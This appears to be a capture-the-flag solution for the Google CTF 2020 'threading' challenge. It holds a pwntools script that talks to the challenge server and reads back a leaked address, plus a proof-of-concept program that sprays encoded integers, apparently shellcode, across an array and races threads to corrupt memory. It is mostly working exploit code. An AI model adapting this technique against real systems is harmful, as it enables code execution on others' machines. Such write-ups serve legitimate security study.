gctf2020quals-threading.py

from pwn import *
import sys

# context.log_level = "debug"

"""
copied from server.cc

This server builds and runs programs written in the DevMaster Sandboxed Programming Language.
Expected input in the following format:
* execute-binary | 1 byte  | If nonzero, built binary is executed. If zero, built binary is instead returned as a response.
* source-size    | 4 bytes | The size of the "source" text field, in little-endian bytes.
* source         | n bytes | ASCII-encoded source code in the DevMaster Sandboxed Programming Language.
If execute-binary is true and the build succeeds, any additional bytes after this input is streamed to the process during execution.

Output is produced in the following format:
* build-success  | 1 byte  | Nonzero if the build succeeded, zero if the build failed.
* response-size  | 4 bytes | The size of the "response" field, in little-endian bytes.
* response       | n bytes | If build-success is 0, the output of the build. If build-success is 1 and execute-binary was nonzero, the built ELF binary. If build-success is nonzero and execute-binary was nonzero, this field is empty.
If build-success and execute-binary are nonzero, any output from program execution is streamed from the process after this output.
"""


r = remote("threading.2020.ctfcompetition.com", 1337)

payload = ""
simp_code = open("poc.simp", "r").read()

# if 0, return binary
if len(sys.argv) == 1:
    payload += p8(1)
else:
    payload += p8(0)

payload += p32(len(simp_code))
payload += simp_code

r.send(payload)

build_success = ord(r.recvn(1))
log.info("build-success = %d" % build_success)

if build_success == 0:
    log.info("something is wrong...")
    r.close()
    sys.exit(0)

# if execute-binary is non-zero, response-size is zero
response_sz = u32(r.recvn(4))
log.info("response-size = %d" % response_sz)

'''
if response_sz == 0:
    print r.recvall()
else:
    open("output", "wb").write(r.recvn(response_sz))
'''


context.log_level = "debug"
sc_addr = int(r.recvuntil(">(").split(">")[0][4:], 16)
log.info("sc = 0x%x" % sc_addr)
r.sendafter("0, 0, 0])", p64(sc_addr))
print r.recvuntil("}")
r.close()

poc.simp

def void t_func(string arg, array<uint64, 1024> aarr1, uint64 val) {
  int32 i = 0;
  while(i < 1024) {
        aarr1[i] = val;
        i = i + 1;
  }

  aarr1[0] = 72340172838123592;
  aarr1[1] = 7434932503368958209;
  aarr1[2] = 302101819166187629;
  aarr1[3] = 3595993771285834276;
  aarr1[4] = 18446667387153390070;
  aarr1[5] = 6352444675345383423;
  aarr1[6] = 10416831502663745898;
}

def int32 main() {
  string message = "Hello, World!\n";

  set_max_native_threads(4);


  ref<array<uint64, 1024>> arr = new<array<uint64, 1024>>();
  print(arr);
  uint64 val = bytes64(read(8));
  int32 i = 0;
  while(i < 1024) {
        deref(arr)[i] = val;
        i = i + 1;
  }

  deref(arr)[0] = 72340172838123592;
  deref(arr)[1] = 7434932503368958209;
  deref(arr)[2] = 302101819166187629;
  deref(arr)[3] = 3595993771285834276;
  deref(arr)[4] = 18446667387153390070;
  deref(arr)[5] = 6352444675345383423;
  deref(arr)[6] = 10416831502663745898;

  thread t1 = make_thread(t_func, message, deref(arr), val);
  join(t1);
  thread t2 = make_thread(t_func, message, deref(arr), val);
  join(t2);
  thread t3 = make_thread(t_func, message, deref(arr), val);
  join(t3);


  return 0;
}